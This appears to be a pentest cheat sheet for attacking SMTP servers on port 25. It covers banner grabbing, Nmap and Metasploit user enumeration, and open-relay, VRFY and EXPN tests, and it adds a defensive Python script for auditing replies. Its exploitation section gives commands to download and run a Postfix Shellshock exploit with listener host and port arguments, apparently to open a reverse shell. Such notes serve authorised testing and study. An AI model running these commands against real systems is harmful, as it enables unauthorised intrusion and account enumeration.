SMTP 25

SMTP Banner Grabbing

Using Netcat

nc -nv <target_ip> 25

After the banner appears, test whether the server answers VRFY for a username:

VRFY root
VRFY test

Using Telnet

telnet <target_ip> 25

Nmap Enumeration

Common Nmap SMTP Scripts

locate .nse | grep smtp

Run a selected set of SMTP scripts, or every SMTP script with a wildcard:

nmap --script smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 <target_ip>
sudo nmap --script "smtp-*" -p 25 <target_ip>

Metasploit Enumeration

Enumerate Users

use auxiliary/scanner/smtp/smtp_enum
set RHOSTS <target_ip>
run

Exploitation

Postfix Shellshock Vulnerability

Using SearchSploit

sudo searchsploit -m linux/remote/34896.py

Run the exploit:

python2 34896.py <target_ip>

Using the Automated Script from GitHub

Download the script:

wget https://raw.githubusercontent.com/3mrgnc3/pentest_old/master/postfix-shellshock-nc.py

Set permissions and execute:

sudo chmod +x postfix-shellshock-nc.py
python2 postfix-shellshock-nc.py <target_ip> <valid-email> <lhost> <lport>

Example:

python2 postfix-shellshock-nc.py 10.11.1.231 useradm@mail.local 192.168.119.177 1234

Common Tests for Enumeration

Test for Open Relay

Connect with Netcat or Telnet, then enter the commands manually:

MAIL FROM:<test@test.com>
RCPT TO:<target@victim.com>
DATA
This is a test message.
.
QUIT

Test for VRFY Command

Use:

VRFY <username>

Test for EXPN Command

EXPN <username>
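
The tests above only help if the replies are read correctly. The following is an added example, not part of the original page, that classifies the replies recorded while running the VRFY, EXPN and relay tests against a server you administer. The function names, the local_domains parameter and the sample transcript are assumptions constructed for illustration.

```python
import re

def reply_code(reply):
    """Return the three-digit SMTP reply code, or None if the line has none."""
    m = re.match(r"\s*(\d{3})(?:[ -]|$)", reply)
    return int(m.group(1)) if m else None

def discloses_users(codes):
    """True when replies let a client tell valid mailboxes from invalid ones."""
    confirmed = bool(codes & {250, 251})
    accepted = any(200 <= c < 300 for c in codes)
    rejected = bool(codes & {550, 551, 553})
    # 252 on its own is non-committal, but 252 for some names and 550 for
    # others still separates real users from unknown ones.
    return confirmed or (accepted and rejected)

def audit(transcript, local_domains):
    """transcript: (command, reply) pairs from unauthenticated test sessions.
    local_domains (assumed input): domains the server should accept mail for."""
    seen, relayed = {"VRFY": set(), "EXPN": set()}, []
    for command, reply in transcript:
        code = reply_code(reply)
        words = command.split()
        if code is None or not words:
            continue
        verb = words[0].upper()
        if verb in seen:
            seen[verb].add(code)
        rcpt = re.match(r"RCPT TO:\s*<[^@>]*@([^>]+)>", command, re.I)
        if rcpt and code in (250, 251) and rcpt.group(1).lower() not in local_domains:
            relayed.append(rcpt.group(1).lower())
    return {"vrfy_discloses_users": discloses_users(seen["VRFY"]),
            "expn_discloses_users": discloses_users(seen["EXPN"]),
            "relays_for": relayed}

# Constructed sample transcript (not captured from a real host).
SAMPLE = [
    ("VRFY root", "252 2.0.0 root"),
    ("VRFY test", "550 5.1.1 <test>: Recipient address rejected: User unknown"),
    ("EXPN root", "502 5.5.2 Error: command not recognized"),
    ("MAIL FROM:<test@test.com>", "250 2.1.0 Ok"),
    ("RCPT TO:<target@victim.com>", "554 5.7.1 <target@victim.com>: Relay access denied"),
]

if __name__ == "__main__":
    print(audit(SAMPLE, {"mail.local"}))
```

A domain listed in relays_for means the server accepted RCPT TO for a domain outside local_domains; treat it as an indicator to follow up on, since acceptance at RCPT does not prove delivery.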

Useful Tools

Automated SMTP Enumeration Scripts

  • smtp-user-enum:

    smtp-user-enum -M VRFY -U usernames.txt -t <target_ip>

  • Metasploit for User Enumeration:

    use auxiliary/scanner/smtp/smtp_enum
    set RHOSTS <target_ip>
    set USER_FILE usernames.txt
    run
